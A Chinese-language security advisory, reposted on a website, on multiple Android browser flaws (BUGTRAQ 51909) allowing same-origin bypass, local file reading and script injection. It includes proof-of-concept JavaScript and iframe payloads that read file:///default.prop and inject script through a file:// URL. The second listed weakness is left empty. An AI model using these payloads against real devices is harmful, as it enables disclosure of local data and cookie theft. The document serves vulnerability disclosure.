Open Handset Alliance Android多个远程安全漏洞

发布日期:2012-02-08
更新日期:2012-02-09

受影响系统:
Open Handset Alliance Open Handset Alliance Android 2.3.2
Open Handset Alliance Open Handset Alliance Android  3.5
Open Handset Alliance Open Handset Alliance Android  3.2
Open Handset Alliance Open Handset Alliance Android  3.1
Open Handset Alliance Open Handset Alliance Android  3.0
Open Handset Alliance Open Handset Alliance Android  2.4
Open Handset Alliance Open Handset Alliance Android  2.3.6
Open Handset Alliance Open Handset Alliance Android  2.3.4
Open Handset Alliance Open Handset Alliance Android  2.3.1
Open Handset Alliance Open Handset Alliance Android  2.3
Open Handset Alliance Open Handset Alliance Android  2.2
Open Handset Alliance Open Handset Alliance Android  2.2
Open Handset Alliance Open Handset Alliance Android  2.1.1
Open Handset Alliance Open Handset Alliance Android  2.1
Open Handset Alliance Open Handset Alliance Android  2.0.1
Open Handset Alliance Open Handset Alliance Android  2.0
Open Handset Alliance Open Handset Alliance Android  1.5 CRCxx
Open Handset Alliance Open Handset Alliance Android  1.5 CRBxx
Open Handset Alliance Open Handset Alliance Android  1.5 CRB-43
Open Handset Alliance Open Handset Alliance Android  1.5 CRB-42
Open Handset Alliance Open Handset Alliance Android  1.5 COCxx
Open Handset Alliance Open Handset Alliance Android  1.5 CBDxx
Open Handset Alliance Open Handset Alliance Android  1.5
Open Handset Alliance Open Handset Alliance Android  1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 51909

Android是Google通过Open Handset Alliance发起的项目,用于为移动设备提供完整的软件集,包括操作系统、中间件等。

Open Handset Alliance在实现上存在多个安全漏洞,远程攻击者可利用这些漏洞绕过同源保护、获取敏感信息、执行任意脚本代码、窃取Cookie验证凭证、执行某些管理员操作。

<*来源:80vul
  *>

测试方法:
--------------------------------------------------------------------------------
警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Cross-domain scripting:
1.

<script>
var request = false;
        if(window.XMLHttpRequest) {
            request = new XMLHttpRequest();
            if(request.overrideMimeType) {
                request.overrideMimeType('text/xml');
            }
        } else if(window.ActiveXObject) {
            var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
            'Microsoft.XMLHTTP',
            'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0',
            'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
            for(var i=0; i<versions.length; i++) {
                try {
                    request = new ActiveXObject(versions[i]);
                } catch(e) {}
            }
        }
              
xmlhttp=request;

//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
xmlhttp.send(null);
var ret = xmlhttp.responseText;

alert(ret);
</script>


2.

<iframe name=f src="https://www.linuxidc.com/location.php" ></iframe>
<script>
function init(){
  f.location = "file:///default.prop";
}
setTimeout(init,5000)
</script>


Security Weakness:

1.

<iframe name=f src="https://www.linuxidc.com/location.php" ></iframe>
<script>
function init(){
  f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";
}
setTimeout(init,5000)
</script>

2.

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwdxdz.html